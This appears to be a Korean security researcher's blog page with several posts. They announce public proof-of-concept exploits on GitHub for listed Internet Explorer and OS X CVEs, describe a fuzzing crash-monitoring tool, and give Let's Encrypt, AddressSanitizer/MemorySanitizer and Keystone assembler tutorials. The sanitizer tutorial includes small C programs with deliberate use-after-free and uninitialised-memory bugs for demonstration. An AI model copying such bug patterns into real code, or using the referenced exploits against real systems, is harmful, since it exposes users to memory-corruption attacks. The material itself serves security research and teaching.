지금까지 찾았던 취약점 POC 공개!
안녕하세요 오랜만에 글을 업로드 해봅니다.
사실 좀 기간이 지나긴 했지만 가끔씩 물어보시는 분들이 계셔서.. 흠흠
몇달전에 제 깃헙에 지금까지 제가 발견했던 취약점들중 일부 POC를 공개했던 적이 있습니다!
모든 취약점을 공개할 수는 없어서 벤더사와 버그바운티사의 허락을 받은 취약점의 POC 만 공개합니다. (주로 브라우저 및 OS, 오픈소스 프로젝트 가 올라가있기도 하고 추가로 올라갈 예정입니다)
POC들은 대부분 웨포나이징의 목적이 아닌 취약점 증명이 목적이라 코드가 그리 깔끔하지 않습니다.
일부 POC는 EIP를 바꾸는 것도 있습니다. (IE 취약점 중엔 Vtguard 를 Memory Leak을 사용하지 않고 우회한 POC도 있었습니다 ㅎㅅㅎ)
Microsoft
Internet Explorer
- CVE-2014-1799
- CVE-2015-0037
- CVE-2015-1712
- CVE-2015-1714
- CVE-2015-2447
- ZDI-CAN-2712
Apple
OSX
- CVE-2016-1818
- CVE-2016-4780
아무튼 제 POC가 공부에 도움이 되시길.. ㅋㅋ
링크는 : https://github.com/sweetchipsw/vulnerability 입니다.
마지막으로..... 도움이 되셨다면 Star도 하나 박아주시면 정말 감사하겠습니다~ ㅎ
'0x10 정보보안 > 0x13 Write-Up' 카테고리의 다른 글
| 지금까지 찾았던 취약점 POC 공개! (1) | 2018.05.23 |
|---|---|
| [Documents] 블로그에서 배포한 문서들 (3) | 2015.08.17 |
| Defcon 2015 coding challenge write-up (0) | 2015.05.18 |
| Codegate 2015 Bookstore2 Write-up [Exploit] (2) | 2015.04.18 |
| Codegate 2015 Bookstore Write-Up [Exploit] (0) | 2015.04.17 |
| CodeGate 2014 PreQual WeirdShark, dodoCrackme (2) | 2014.02.25 |
Comment 1
sweetmon 릴리즈!
드디어.. 우리 동아리 SSG에서 빵빵빵 세미나 라는 자리에서 sweetmon 을 공개하고 Github에 공식적으로 릴리즈했습니다.
상세한 설명은 아래 sweetmon 주소를 참고해주시고..
첫번째 오픈소스 프로젝트라서 부족한 점이 많습니다.. (버그도 오늘 시연도중에 하나 발견했네요 ㅋㅋㅋ)
그리고 생각보다 버그가 많아서.. 하나하나 수정할 예정입니다.. ;ㅅ;
PEP 코딩 컨벤션도 지키지 않아서 개발자 분이 본다면 경악하실 수도 있겠습니다만.. (원래 혼자 쓰려고 했다는 말로 핑계를 대봅니다.. ;ㅅ;)
그래도.. 다시한번 sweetmon 을 소개해드리면
sweetmon은 Fuzz tester 들을 위해서 제작된 퍼져 및 크래시 모니터링 서비스로 다수의 VM에서 퍼징을 할 때 간단한 코딩으로 쉽게 크래시를 한 서버로 모아주고 알림해주는 서비스입니다.
코드는 모두 오픈소스이며, MIT 라이센스를 적용하였습니다.
프로젝트 및 디테일은 아래 링크에서 확인하실 수 있습니다.
https://github.com/sweetchipsw/sweetmon
https://github.com/sweetchipsw/sweetmon_client
버그 및 건의는 Issue 또는 Pull Request를 이용해주세요~
'0x10 정보보안 > 0x11 security' 카테고리의 다른 글
| sweetmon 릴리즈! (4) | 2017.09.23 |
|---|---|
| sweetmon 진전 상황 (5) | 2017.08.16 |
| 요즘 개발중인 퍼져 모니터링 시스템[?] (5) | 2017.04.23 |
| GITHUB 업데이트 완료! (0) | 2017.04.04 |
| 무료 SSL 인증서 발급 받기 (letsencrypt) (0) | 2017.02.02 |
| MSRC Top 100 선정! (5) | 2015.08.16 |
Comment 4
-
퍼징에 대해 공부를 많이 하게 되었을 때 꼭 써보고 싶네요. ㅋㅋ축하드립니다~
sweetmon 진전 상황
오랜만의 포스팅!
퍼져 모니터링 시스템인 sweetmon의 개발 상황을 메모 해두고자 오랜만에 포스팅 합니다!
우선 sweetmon 제가 Fuzzing 연구를 할때 다수의 VM에서 퍼징을 돌리곤 합니다.
그럴때마다 크래시가 새로 나올때마다 VM 하나하나 들여다보면서 나왔나 안나왔나.. 보는게 좀 많이 귀찮아서 그냥 한곳으로 파일을 쏴주는 스크립트를 제작하곤 했습니다.
하지만 귀찮음으로 인하여 계속 버그도 생기고 문제가 자주 발생해서 아예 (이전 보다는) 제대로 한곳으로 크래시를 모아주는 것을 만들어보자! 라고 해서 시작한 프로젝트가 sweetmon입니다.
그래서 기반 언어는 멀티플랫폼을 지원하는 Python을 선택했고 Django 프레임워크를 이용하여 개발했습니다.
프론트는 부트스트랩 템플릿인 Dashgum Free버전을 이용하여 개발했습니다!
현재는 잠시 퍼징 연구를 멈춰서 개발을 중단했다가 잉여한 방학생활을 의미있게 보내기 위해서 다시 개발을 시작했습니다.
그리하여.. 기능도 하나 둘 추가로 생기고 있습니다.
우선 현재 돌아가고 있는 각 Fuzzer의 상태를 모니터링 할 수 있고! (Fuzzer에서 웹 서버에 Ping을 때리면 돌고 있는 상태로 간주합니다)
몇개의 크래시가 나왔는지, 몇개의 테스트케이스가 돌았는지(이거는 사라질 수도 있는 기능..)을 모니터링 할 수 있습니다.
그리고 IDX옆에 있는 버튼을 누르면 Fuzzer의 IP, 타겟, 운영체제 등을 상세하게 볼 수 있습니다.
그리고 크래시의 목록들..
32번 ~ 35번을 보시면 됩니다!
각 크래시는 어떤 퍼져에서 나왔는지, 어떤 타겟이고 언제, 몇개의 동일한 크래시가 나왔는지 볼수 있습니다.
그리고 크래시 정보에 들어가면 이름, 리포트된 날짜, 타겟, 퍼져, 로그(로그는 퍼져가 직접 서버로 쏴줘야 합니다), 해시, 크기 등을 볼 수 있습니다.
아 그리고 간단하게 코멘트를 달 수 있는 기능도 있군요.
그리고.. 크래시 샘플을 다운로드 받을 수 있도록 다운로드 기능과 다른 사람에게 크래시를 공유하고 싶다면 1회용 링크를 생성해서 공유할 수 있습니다.
또한 중복된 크래시 샘플의 리스트를 쭉 볼수 있습니다. (가끔 퍼징을 하다보면 중복 크래시가 많이 나올때 최대한 작은 샘플을 구하고 싶을때가 있죠?)
그외 여러 기능들이 있지만 아직은 완성되지 않은 기능들이고..
일단 완성된 것들을 알려드리면
텔레그램 및 이메일 알림기능을 추가했고 유저가 쉽게 켜고 끌 수 있습니다. (전송 테스트도 가능해요!)
또한 싱글 유저에서 여러명이 사용 가능한 멀티 유저로 코드를 갈아 엎었고..
sweetmon과 개발자 정보도 넣었습니다. (추후에 오픈소스로 공개시 도움이 된 분들은 비트코인으로 Dontation을.. 읍읍..)
그리고 사진에 있지 않은 기능들은..
- 제보한 취약점에 대해서 메모할 수 있는 기능
- sweetmon-client 와 그나마 쉽게 연동 가능하도록 퍼져의 정보를 한번 등록해두면 자동으로 설정정보를 생성해주는...?
- 메인 메뉴의 통계.. (매우 허접하여 없어질 가능성이 큼)
- Fuzzer 등록 관리, 크래시 및 로그 전송, 핑 체크 등 퍼져와 연결할 수 있는 기능들
앞으로 개발 할 내용은..
- 유저간 크래시를 공유
- 크래시 암호화?
- 기타 잡다한 기능들
등등이 있겠습니다.
그리고 지난번에 잠깐 언급한 sweetmon-client 는 웹 서버와 본인의 퍼져를 쉽게 연결할 수 있고 확장성을 고려하여 프레임워크같이 제작했습니다.
install.py를 실행하면 서버와 연결할 수 있는 정보가 생성되는데 이떄 제 유저 토큰을 입력하면 퍼져 리스트에 올라오도록 합니다.
(사진 재탕)
바로 7번 처럼 올라오게 되고
아래 코드를 이용하여 핑체크 및 크래시, 로그 전송이 가능합니다.
from sweetmon import *
F = Fuzzer(FUZZERINFO)
print("TEST PING", F.Ping())
print("TEST UPLOAD", F.Upload("test title", "here\nis_l0g", "/tmp/crashsample"))
print("END OF TEST..")
이렇게 업로드된 크래시는
( 또 재탕)
이렇게 서버에서 확인할 수 있게 됩니다.
나머지 기능은 또 귀찮음으로 인해 언제 개발이 될지는 모르겠네요..
언젠가 제 첫번째 오픈소스 프로젝트가 되면 좋겠습니다 후후
끝!
'0x10 정보보안 > 0x11 security' 카테고리의 다른 글
| sweetmon 릴리즈! (4) | 2017.09.23 |
|---|---|
| sweetmon 진전 상황 (5) | 2017.08.16 |
| 요즘 개발중인 퍼져 모니터링 시스템[?] (5) | 2017.04.23 |
| GITHUB 업데이트 완료! (0) | 2017.04.04 |
| 무료 SSL 인증서 발급 받기 (letsencrypt) (0) | 2017.02.02 |
| MSRC Top 100 선정! (5) | 2015.08.16 |
Comment 5
-
비밀댓글입니다
- ㄴ
지난번에 포스팅한 글에서 장고를 접하며 신세계라고 하셔서
장고로 웹개발 접하고 있어요.. 다들 쉽다곤 하는데 쉬운게 맞는건지..ㅋㅋ
방학인데 포스팅좀 많이 해주세요 ㅎㅎ- ㄴ
요즘 개발중인 퍼져 모니터링 시스템[?]
요즘 한창 개발중인 프로젝트 sweetmon 입니다.
sweetmon 은 제 닉네임 sweetchip 과 monitor 가 합쳐져서 그냥 퍼져와 크래시를 모니터링 한다는 의미로
재미로 만들고 있는 프로젝트 입니다.
원래 이번이 처음은 아니었고 예전 브라우저 버그헌팅시 여러 VM에서 퍼져를 돌리고 한곳으로 모을때 잠시 php 버전으로 만들었는데
너무 귀찮아서 중간에 때려쳤다가 다시 퍼징할 일이 생기기를 몇번을 반복하다 보니
그때마다 편의를 위해 계속 크래시를 한곳으로 모아주는 것을 만들어야 하는 일이 있었습니다.
이번에도 그런 일이 있어서 그냥 이참에 하나 다시 만들자라고 생각해서 같은 동아리 부원인 @shc 의 추천으로 Django 를 접하게 되었습니다.
웹 개발이라고는 PHP와 HTML로 살짝 건드려본 적 밖에 없어서 웹 개발쪽 시야가 좁았던 저에게는
장고 라고 하는 프레임워크를 다루다보니 엄청난 신세계였습니다.
PHP보다 개발이 훨씬 간단하고 코드의 양도 확실히 줄면서 재미를 붙이다보니 기능도 계속 넣게되고..
지금까지 오게 되었네요.
이번 포스팅의 사진은 거의 모자이크밖에 없지만..
실제로 돌리고 있는 모습입니다.
웹서버(Python+Django+Apache) 에서는 Fuzzer와 Machine / Crash들의 정보를 받아와서 저장하고 뿌려주는 API를 제공해줍니다.
예를들어 server.com/fuzz/crash 는 크래시가 발생했을 경우 업로드 기능을 지원합니다.
이외에 현재 제보했던 버그 리스트를 저장할 수 있도록 간단한 메모 기능을 만들었습니다.
기능을 간단히 정리해보면..
퍼져 및 머신의 정보 출력 / 크래시 업로드 및 업로드 된 크래시 리스팅 및 정보 출력 + 1회용 다운로드 링크
Fuzzer 업로드/다운로드 기능, Testcase 업로드/다운로드 기능
리포팅한 버그들 메모 기능
새로운 크래시 텔레그램 및 이메일 알림 기능
등이 있겠네요.
상세한 기능들은 나중에 다시 정리 하는걸로 하고..
아무튼 sweetmon 을 만들게 된 계기는 윈도우에서든 리눅스에서든 맥에서든 어디서든지 어떤것을 퍼징을 하든
한곳으로 잘 모아주는 것을 원했습니다.
그래서 본인이 만든 퍼져나 AFL같은 퍼져등을 이용해도 sweetmon을 이용할 수 있도록 만드려고 노력하는 중입니다.
하지만 제가 개발 경험이 그리 많지는 않아서 쉽지만은 않네요.
서버가 있으면 클라이언트도 있어야겠죠?
클라이언트는 Python 언어를 기반으로 서버에서 제공하는 API들을 래핑하여 쉽게 사용할 수 있도록 제공할 예정입니다.
현재 목표 코드는 sweetmon.py 및 config.py 만 나눠주고 그것을 이용해서 본인의 퍼져에 맞출 수 있도록 하는 것이 목적입니다.
그냥 퍼징 프레임워크라고 보시면 됩니다.
아래 예제 코드를 보시면..
from sweetmon import *
count = 0
F = Fuzzer(fConfig)
while 1:
if count % 1000 == 0:
F.ping() # 서버에 핑 날림
log = run("windbg ... ... ./fuzzer.exe") # windbg에서 생성된 로그파일 받아옴
if CheckCrash(log) == True: # CheckCrash 는 로그에서 크래시가 발생했는지 여부를 체크해주는 함수
F.upload("0023:41414141=????????", "./testcase1234.log", "./testcase1234.file") # 서버에 Title 과 크래시 로그 업로드.
count += 1
위는 제가 대략 생각하고 있는 것인데..
만약 직접 만든 Fuzzer든 AFL같은 퍼져를 이용하든 로그파일을 분석하는건 모든 퍼져마다 다른건 당연하니
퍼져 돌리는 함수 / 크래시인지 아닌지 판별하는 함수등은 각각 알아서 제작 하도록 합니다.
클라이언트에서 제공해 주는 것은 핑 날리기 / 파일 업로드 (Title, 크래시 로그, 크래시파일) 등 서버와 통신에 필요한 기능만 제공합니다.
그래서 어느 운영체제에서든 python만 지원되는 환경일때 각 퍼져에 맞게 간단한 코딩만 해주면 퍼져 및 크래시를 서버에서 모니터링을 할수 있게 됩니다.
추후엔 암호화 기능도 넣고 여러 유저가 크래시를 공유하는 기능도 만들고 지금 있는 버그도 고치고 여러가지 할게 많네요.
제가 주로 쓸 용도로 만드는 것이긴 하지만 오픈소스로 공개할 예정도 있습니다. (물론 쓸 사람이 있을진 모르겠지만요.. ㅠ)
하지만 언제가 될진 모르겠네요 ㅋㅋ
시험기간에 심심해서(!?) 오랜만에 적어봤습니다.
'0x10 정보보안 > 0x11 security' 카테고리의 다른 글
| sweetmon 릴리즈! (4) | 2017.09.23 |
|---|---|
| sweetmon 진전 상황 (5) | 2017.08.16 |
| 요즘 개발중인 퍼져 모니터링 시스템[?] (5) | 2017.04.23 |
| GITHUB 업데이트 완료! (0) | 2017.04.04 |
| 무료 SSL 인증서 발급 받기 (letsencrypt) (0) | 2017.02.02 |
| MSRC Top 100 선정! (5) | 2015.08.16 |
Comment 5
GITHUB 업데이트 완료!
1월 포스팅을 하면서 올해는 정보공유좀 해야지 하고 다짐[?] 했던 것이 생각나서 처음으로 깃헙을 업데이트 했습니다.
이번에 공개한건.. 작년 6월쯤에 애플에 제보했던 Rootless bypass 취약점과 2015년 Codegate 에서 출제한 두가지 문제(Bookstore, Bookstore2)의 소스코드를 공유했습니다.
SSG CTF를 준비하면서 CTF문제를 처음 출제하는 친구들에게만 공유 하려다가 그냥 묵혀두면 뭐하나 해서 전체 공유를 하기로 했습니다.
앞으로 취약점레포에는 올릴수 있는 취약점의 POC코드를 공개할 예정이고.. (가능하려나...)
그리고 예전에 출제한 다른 CTF들의 문제도 공개할 예정입니더.
https://github.com/sweetchipsw
'0x10 정보보안 > 0x11 security' 카테고리의 다른 글
| sweetmon 진전 상황 (5) | 2017.08.16 |
|---|---|
| 요즘 개발중인 퍼져 모니터링 시스템[?] (5) | 2017.04.23 |
| GITHUB 업데이트 완료! (0) | 2017.04.04 |
| 무료 SSL 인증서 발급 받기 (letsencrypt) (0) | 2017.02.02 |
| MSRC Top 100 선정! (5) | 2015.08.16 |
| Inc0gnito 2014 - Fuzzing For Fun (6) | 2014.08.20 |
Comment 0
무료 SSL 인증서 발급 받기 (letsencrypt)
얼마전에 SSL 인증서를 사용해야 할 일이 있어서 정보를 찾던 중 letsencrypt 라는 것이 있다고 한다.
자세한 정보는 아래 링크에서 확인 하자.
설치는 우분투 기준으로 apt 로 가능하다.
apt install letsencrypt
하면 설치가 끝난 것이고
sudo letsencrypt certonly -a standalone -d domain.com
를 입력하면 인증서가 만들어진다.
self-signed가 아니라서 빨간 자물쇠도 아니다!
*참고로 80번 포트를 사용하므로 웹서버등의 80번 포트를 사용하는 프로그램은 잠시 닫아줘야 한다.
IMPORTANT NOTES:
- Congratulations! Your certificate and chain have been saved at
/etc/letsencrypt/live/domain.com/fullchain.pem. Your
cert will expire on 2017-mm-dd. To obtain a new version of the
certificate in the future, simply run Let's Encrypt again.
- If you like Let's Encrypt, please consider supporting our work by:
Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate
Donating to EFF: https://eff.org/donate-le
$ sudo ls /etc/letsencrypt/live/domain/
cert.pem chain.pem fullchain.pem privkey.pem
아파치 설정의 SSL 설정은 아래와 같이 하자
SSLCertificateFile /etc/letsencrypt/live/domain.com/cert.pem
SSLCertificateKeyFile /etc/letsencrypt/live/domain.com/privkey.pem
SSLCertificateChainFile /etc/letsencrypt/live/domain.com/chain.pem
인증서 기간이 90일로 짧은 편이긴 한데 명령어 몇개로 간단하게 갱신이 가능하다고 한다.
무료에 crontab 등으로 일정 기간마다 갱신하게 하면 편할 것 같다.
원래 startssl을 이용하기도 했었는데 이건 명령어 몇개만 입력하면 인증서가 만들어져서 훨씬 편하다!
참고로 갱신하는 명령어는 아래 명령어로 끝난다.
[root@localhost ~]$ service apache2 stop
[root@localhost ~]$ letsencrypt renew
SSL 인증서 설정을 위와 같이 live 디렉터리에 했다면 심볼릭링크로 새로운 인증서로 자동으로 연결되므로 경로를 바꾸거나 하지 않아도 좋다.
'0x10 정보보안 > 0x11 security' 카테고리의 다른 글
| 요즘 개발중인 퍼져 모니터링 시스템[?] (5) | 2017.04.23 |
|---|---|
| GITHUB 업데이트 완료! (0) | 2017.04.04 |
| 무료 SSL 인증서 발급 받기 (letsencrypt) (0) | 2017.02.02 |
| MSRC Top 100 선정! (5) | 2015.08.16 |
| Inc0gnito 2014 - Fuzzing For Fun (6) | 2014.08.20 |
| 생애 첫 국외 프로그램 취약점 헌팅 (6) | 2014.07.31 |
Comment 0
ASAN - AddressSanitizer
https://github.com/google/sanitizers/wiki/AddressSanitizer
구글의 깃허브에 정의된 ASAN 은 c/c++로 제작된 프로그램에서 버그를 디텍션 해주는 툴 이라고 보면 된다.
따로 설치해서 해야 하는건 없고 컴파일러 Clang 을 설치한뒤 컴파일 할때 -fsanitize=address 옵션만 붙여주도록 하자.
맨 위의 사진은 ASAN을 적용해서 디텍션할 수 있는 버그들의 목록이다.
Sanitizer 시리즈로는 아래와 같은 것들이 있다.
AddressSanitizer (detects addressability issues) - https://github.com/google/sanitizers/wiki/AddressSanitizer
LeakSanitizer (detects memory leaks) - https://github.com/google/sanitizers/wiki/AddressSanitizerLeakSanitizer
ThreadSanitizer (detects data races and deadlocks) for C++ and Go - https://github.com/google/sanitizers/wiki/ThreadSanitizerCppManual
MemorySanitizer (detects use of uninitialized memory) - https://github.com/google/sanitizers/wiki/MemorySanitizer
사용법은 위 링크에 모두 나와있으니 ASAN과 MSAN만 사용해보도록 하자.
우선 위 기능을 사용하기 위해서 Clang을 설치한다.
sudo apt install clang
*참고 - 기준은 ubuntu 16.04 server *bit LTS 버전이다.
#include <stdlib.h>
// clang -fsanitize=address -O1 -fno-omit-frame-pointer uaf.c -o uaf
int main() {
char *x = (char*)malloc(10 * sizeof(char*));
free(x);
return x[5];
}
위의 예제 코드를 보면 malloc으로 메모리를 할당하고 바로 Free시킨다. 그 이후 Free된 메모리 x를 접근하는데 이는 Free된 메모리를 재 사용하는
Use-After-Free라고 볼 수 있다.
이를 2번째 줄에 있는 커맨드로 컴파일 해보자.
이때 -fsanitize=address 는 ASAN을 사용하겠다는 것이고, -O1은 최적화 (옵션, 아래 페이지에 있어서 그냥 붙임.)
-fno-omit-frame-pointer는 더 좋은 스택트레이스 결과를 보기위해 붙이라고 한다.
각각의 옵션에 대한 정보는 https://github.com/google/sanitizers/wiki/AddressSanitizer#using-addresssanitizer 을 참고하도록 하자.
[sweetchip@ubuntu sanitizer]$ clang -fsanitize=address -O1 -fno-omit-frame-pointer uaf.c -o uaf
[sweetchip@ubuntu sanitizer]$ ./uaf
=================================================================
==10400==ERROR: AddressSanitizer: heap-use-after-free on address 0x60700000dfb5 at pc 0x0000004e9bbe bp 0x7ffd5c55f6f0 sp 0x7ffd5c55f6e8
READ of size 1 at 0x60700000dfb5 thread T0
#0 0x4e9bbd (/home/sweetchip/sanitizer/uaf+0x4e9bbd)
#1 0x7f031f59582f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#2 0x418518 (/home/sweetchip/sanitizer/uaf+0x418518)
0x60700000dfb5 is located 5 bytes inside of 80-byte region [0x60700000dfb0,0x60700000e000)
freed by thread T0 here:
#0 0x4b84c0 (/home/sweetchip/sanitizer/uaf+0x4b84c0)
#1 0x4e9b8a (/home/sweetchip/sanitizer/uaf+0x4e9b8a)
#2 0x7f031f59582f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
previously allocated by thread T0 here:
#0 0x4b8648 (/home/sweetchip/sanitizer/uaf+0x4b8648)
#1 0x4e9b7f (/home/sweetchip/sanitizer/uaf+0x4e9b7f)
#2 0x7f031f59582f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
SUMMARY: AddressSanitizer: heap-use-after-free (/home/sweetchip/sanitizer/uaf+0x4e9bbd)
Shadow bytes around the buggy address:
0x0c0e7fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff9be0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c0e7fff9bf0: fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd
0x0c0e7fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==10400==ABORTING
그리고 위처럼 디버그 정보가 쭉 출력되고 스택트레이스 정보가 출력된다.
이번엔 MSAN을 사용해보자.
Asan처럼 그냥 옵션만 추가해주면 사용할 수 있기 떄문에 우선 Clang을 설치한 상태여야 한다.
[sweetchip@ubuntu sanitizer]$ cat umr.cc
#include <stdio.h>
//clang -fsanitize=memory -fPIE -pie -fno-omit-frame-pointer -g -O2 umr.cc -o umr -fsanitize-memory-track-origins
int main(int argc, char** argv) {
int a[10];
a[5] = 0;
if (a[argc])
printf("xx\n");
return 0;
}
이때 -fsanitize=memory 는 MSan을 사용하겠다는 것이고, -fPie -pie는 예제에 붙어있길래 같이 붙였다. 안붙여도 결과만 보는데는 크게 문제가 없는듯 하다.
-fsanitize-memory-track-origins 는 어느 함수에서 메모리를 할당시켰는지 추적할 수 있는 기능이다.
-fno-omit-frame-pointer 는 ASAN과 같이 스택 트레이서 기능이다.
위 예제 코드를 보면 a배열을 초기화하지 않은 것에 문제가 발생한다.
이 경우 a[argc]로 접근하게 될 경우 여러 문제가 발생할 수 있다.
[sweetchip@ubuntu sanitizer]$ ./umr 5
==10456==WARNING: MemorySanitizer: use-of-uninitialized-value
#0 0x563e3030d568 (/home/sweetchip/sanitizer/umr+0x87568)
#1 0x7fd85136082f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#2 0x563e3029ff88 (/home/sweetchip/sanitizer/umr+0x19f88)
Uninitialized value was created by an allocation of 'a' in the stack frame of function 'main'
#0 0x563e3030d430 (/home/sweetchip/sanitizer/umr+0x87430)
SUMMARY: MemorySanitizer: use-of-uninitialized-value (/home/sweetchip/sanitizer/umr+0x87568)
Exiting
[sweetchip@ubuntu sanitizer]$ ./umr 100
==10457==WARNING: MemorySanitizer: use-of-uninitialized-value
#0 0x56272224f568 (/home/sweetchip/sanitizer/umr+0x87568)
#1 0x7f0f5626782f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#2 0x5627221e1f88 (/home/sweetchip/sanitizer/umr+0x19f88)
Uninitialized value was created by an allocation of 'a' in the stack frame of function 'main'
#0 0x56272224f430 (/home/sweetchip/sanitizer/umr+0x87430)
SUMMARY: MemorySanitizer: use-of-uninitialized-value (/home/sweetchip/sanitizer/umr+0x87568)
Exiting
MSan 은 위처럼 결과가 나온다.
잘만 사용하면 써먹을 곳이 꽤나 많을듯 하다.
'0x10 정보보안 > 0x14 Reverse Engineering' 카테고리의 다른 글
| 메모리 버그 디텍터 - ASAN (AddressSanitizer) 사용법 (3) | 2016.06.09 |
|---|---|
| 멀티 아키텍쳐 지원 어셈블러 Keystone (0) | 2016.06.08 |
| 윈도우 XP, 7에서의 WINDBG 를 이용한 Kernel Debugging (커널 디버깅) (3) | 2015.06.21 |
| IOS 앱 원본 바이너리 추출 및 복호화 - dumpdecrypted (10) | 2015.03.09 |
| [Fuzzer 만들기 프로젝트!] Pydbg 한번에 설치하기 (2) | 2013.10.04 |
| NewHeart 2013 Write ups - reversing (1) | 2013.05.29 |
Comment 3
멀티 아키텍쳐 지원 어셈블러 Keystone
오호..
엄청난 툴이 나왔습니다..!!
최근에 멀티 아키텍쳐를 지원하는 opcode generator 를 만들고 있었는데 버그를 만나서 때려쳤는데 얼마 지나지 않아 Keystone 이라고 하는 어셈블러가 나왔네요.
오예
프로젝트의 주소는 https://github.com/keystone-engine/keystone 에서 받고 빌드하실 수 있습니다...!!
공식 홈페이지의 주소는 http://www.keystone-engine.org/ 입니다.
깃에 써있는것을 보면..
Keystone is a lightweight multi-platform, multi-architecture assembler framework. It offers some unparalleled features:
- Multi-architecture, with support for Arm, Arm64 (AArch64/Armv8), Hexagon, Mips, PowerPC, Sparc, SystemZ & X86 (include 16/32/64bit).
- Clean/simple/lightweight/intuitive architecture-neutral API.
- Implemented in C/C++ languages, with bindings for Python, NodeJS, Ruby, Go, Rust & Haskell available.
- Native support for Windows & *nix (with Mac OSX, Linux, *BSD & Solaris confirmed).
- Thread-safe by design.
- Open source - with a dual license.
Keystone is based on LLVM, but it goes much further with a lot more to offer.
Further information is available at http://www.keystone-engine.org
이렇게 써있군요.
오픈소스에 멀티아키텍쳐 및 다양한 언어 지원!! 얼른 써봅시다
Git clone 으로 서버에 받고 나서 빌드 스크립트를 실행하기 전에 아래 Dependency 를 해결해줍시다.
sudo apt-get install cmake
그 이후 keystone의 루트 디렉터리에 build 라는 폴더를 만들고 이동합니다.
그리고 ../make-share.sh 스크립트를 실행해주면 알아서 make를 날려줍니다.
[sweetchip@ubuntu keystone]$ mkdir build
[sweetchip@ubuntu keystone]$ cd build/
[sweetchip@ubuntu build]$ l
[sweetchip@ubuntu build]$ ../make-share.sh
+ [ -n ]
+ cmake -DCMAKE_BUILD_TYPE=Release -DBUILD_SHARED_LIBS=ON -DLLVM_TARGETS_TO_BUILD=all -G Unix Makefiles ..
-- The C compiler identification is GNU 5.3.1
-- The CXX compiler identification is GNU 5.3.1
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- The ASM compiler identification is GNU
....
[ 98%] Linking CXX shared library ../lib/libkeystone.so
[ 98%] Built target keystone
Scanning dependencies of target kstool
[ 99%] Building CXX object kstool/CMakeFiles/kstool.dir/kstool.cpp.o
[100%] Linking CXX executable kstool
[100%] Built target kstool
make가 끝났으면 make install로 마무리 해줍니다.
[sweetchip@ubuntu build]$ sudo make install
[ 98%] Built target keystone
[100%] Built target kstool
Install the project...
-- Install configuration: "Release"
-- Installing: /usr/local/lib/pkgconfig/keystone.pc
-- Installing: /usr/local/include/keystone
-- Installing: /usr/local/include/keystone/x86.h
-- Installing: /usr/local/include/keystone/systemz.h
-- Installing: /usr/local/include/keystone/hexagon.h
-- Installing: /usr/local/include/keystone/sparc.h
-- Installing: /usr/local/include/keystone/arm64.h
-- Installing: /usr/local/include/keystone/ppc.h
-- Installing: /usr/local/include/keystone/mips.h
-- Installing: /usr/local/include/keystone/keystone.h
-- Installing: /usr/local/include/keystone/arm.h
-- Installing: /usr/local/lib/libkeystone.so.0
-- Installing: /usr/local/lib/libkeystone.so
-- Installing: /usr/local/bin/kstool
-- Set runtime path of "/usr/local/bin/kstool" to ""
자 이러면 설치 끝!
매우 쉽죠?
간단하게 사용해봅시다.
우선 커맨드라인으로 빠르게 보고싶다면..
[sweetchip@ubuntu build]$ kstool x32 "nop"
nop = [ 90 ]
[sweetchip@ubuntu build]$ kstool x32 "add eax, ebx"
add eax, ebx = [ 01 d8 ]
[sweetchip@ubuntu build]$ kstool arm "mov r1, r1"
mov r1, r1 = [ 01 10 a0 e1 ]
오홍.. 역시 기대한 대로 잘 나오는군요
Kstool v1.0 for Keystone Assembler Engine (www.keystone-engine.org)
By Nguyen Anh Quynh, 2016
Syntax: kstool <arch+mode> <assembly-string> or cat <asmfile> | kstool <arch+mode>
The following <arch+mode> options are supported:
x16: X86 16bit, Intel syntax
x32: X86 32bit, Intel syntax
x64: X86 64bit, Intel syntax
x16att: X86 16bit, AT&T syntax
x32att: X86 32bit, AT&T syntax
x64att: X86 64bit, AT&T syntax
x16nasm: X86 16bit, NASM syntax
x32nasm: X86 32bit, NASM syntax
x64nasm: X86 64bit, NASM syntax
arm: ARM - little endian
armbe: ARM - big endian
thumb: Thumb - little endian
thumbbe: Thumb - big endian
arm64: AArch64
hexagon: Hexagon
mips: Mips - little endian
mipsbe: Mips - big endian
mips64: Mips64 - little endian
mips64be: Mips64 - big endian
ppc32be: PowerPC32 - big endian
ppc64: PowerPC64 - little endian
ppc64be: PowerPC64 - big endian
sparc: Sparc - little endian
sparcbe: Sparc - big endian
sparc64: Sparc64 - little endian
sparc64be: Sparc64 - big endian
systemz: SystemZ (S390x)
위는 지원하는 목록입니다.
[sweetchip@ubuntu python]$ ls
